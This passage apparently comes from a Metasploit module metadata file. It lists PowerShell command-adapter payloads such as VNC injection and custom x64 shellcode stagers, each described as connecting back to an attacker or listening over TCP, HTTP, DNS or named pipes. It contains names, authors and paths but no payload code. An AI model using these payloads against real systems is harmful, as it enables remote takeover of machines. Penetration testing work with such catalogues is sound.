"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/vncinject/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/vncinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/vncinject/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/custom/bind_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_http": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_https": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps", - "aliases": [], 